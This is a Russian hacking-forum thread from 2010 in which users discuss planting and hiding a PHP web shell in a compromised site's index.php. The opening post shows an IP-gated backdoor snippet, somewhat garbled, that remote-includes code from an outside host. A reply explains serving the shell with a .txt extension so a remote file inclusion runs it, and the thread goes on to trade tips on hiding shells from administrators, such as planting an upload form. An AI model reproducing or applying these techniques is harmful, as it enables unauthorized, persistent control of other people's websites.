Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Вопрос по php :) (https://forum.antichat.xyz/showthread.php?t=171901)

seofilms 19.01.2010 17:40
Вопрос по php :)
 
Привет ачату, хотел спросить, возможно ли вставить код пхп с чужого сайта ?
Допустим есть шелл на сайте www.blabla.ru/shell.php
и есть сайт www.gavgav.ru, хотелось бы исправить index чтоб при открытии открывался мой шелл на этом сайте.
Как я понял если вставлять инклюд то грузится тока уже
выполненный код, кто нибудь подскажет как сделать грузился сам код шелла ? :)
PHP код:
<?
$ip_ds = array('10.0.60.23','127.0.0.1','127.0.0.1');
else echo"Нима blabla.php";die();
 
$user_ip_ds $_SERVER['REMOTE_ADDR'];
$col count($ip_ds);
$pr_ds=0;
for($i=0$i<$col;$i++)
{if($ip_ds[$i]==$user_ip_ds){$i=$col$pr_ds="777";}}
if($pr_ds!=777) echo"not foud";
if($pr_ds==777) include ('http://www.parkour1.ic.cz/config');  
?>

mailbrush 19.01.2010 17:55
Сохраняй и инклудь шелл с расширением .txt, чтобы код не интерпретировался.

Pashkela 19.01.2010 18:02
По сабжу - гы, а чо, прикольно, взял и прочитал config.php с чужого сайта, да? ))))

PS: Хотя задумка с шеллами конечно просто великолепна

Цитата:
Сообщение от mailbrush
Сохраняй и инклудь шелл с расширением .txt, чтобы код не интерпретировался.
кхм, тема просто отличная, серьезно )

mailbrush 19.01.2010 18:16
Цитата:
Сообщение от Pashkela
кхм, тема просто отличная, серьезно )
Эм... не понял иронии... в общем я всегда так делаю - у меня на хосте лежит шелл с .txt расширением. Нахожу RFI, инклужу его...

seofilms 19.01.2010 18:17
Всё получилось, Mailbrush большое спасибо :)

Pashkela 19.01.2010 18:18
Цитата:
Сообщение от mailbrush
Эм... не понял иронии... в общем я всегда так делаю - у меня на хосте лежит шелл с .txt расширением. Нахожу RFI, инклужу его...
...и перечитай свой первый пост в теме - ты можешь посмотреть сорцы шелла не из шелла?)

инетересно чо там у ТС получилось

PS: Перечитал первый вопрос - таки понял, чего спрашивали. Ну и езык

лично мне вот такая фраза:

Цитата:
кто нибудь подскажет как сделать грузился сам код шелла ?
напоминает, например, это: http://pastebin.com

seofilms 19.01.2010 18:32
Цитата:
инетересно чо там у ТС получилось
Да заливал на сайт шеллы, их постоянно удаляли, терь попробовал вставить в index.php этот инклюд который работает тока с ip деда, недумаю что в index.php он будет искать :D

Pashkela 19.01.2010 18:36
Нет, что ты, ни один нормальный админ в index.php ставший на ~ 50 кб больше и содержащий кучу непонятного кода в жизни не заглянет )

seofilms 19.01.2010 18:37
Цитата:
Нет, что ты, ни один нормальный админ в index.php ставший на ~ 50 кб больше и содержащий кучу непонятного кода в жизни не заглянет )
ничо там нету он изменился маскимум на 2кб + там никакого кода нету кроме инклюда и проверки ip...

seofilms 19.01.2010 18:39
Цитата:
Pashkela
как ты прячешь shellы ?

Pashkela 19.01.2010 18:41
Конечно не скажу, о чем ты. Ну сам подумай. Это траф, а траф - это деньги. Тебе нужны мои деньги? Мне тоже.

PS: Ну уж точно не удаленный инклуд, паля сразу и домен (сколько он после такого проживет?) и надеясь на постоянный allow_url_include = on

seofilms 19.01.2010 18:48
Цитата:
паля сразу и домен
:D narod.ru
Цитата:
allow_url_include = on
вот это да... (((
мб посоветуешь что нить норм, то что не в привате))) ?

Pashkela 19.01.2010 18:53
вставь например просто форму загрузки файла, или....в общем читай "Ваши вопросы по уязвимостям" на этом сайте - там все есть.

seofilms 19.01.2010 19:02
Ладно, спасибо :)

imajo.ati 20.01.2010 13:38
Цитата:
Сообщение от seofilms
он изменился маскимум на 2кб + там никакого кода нету кроме инклюда и проверки ip...
фига се проверка на ip на 2 кб ))

seofilms 20.01.2010 17:25
Цитата:
фига се проверка на ip на 2 кб ))
да это я от балды написал)))

seofilms 20.01.2010 19:43
Шелл удалили((( жесть.. кто нить подскажите кто нибудь норм способ спрятать шелл(


Время: 07:58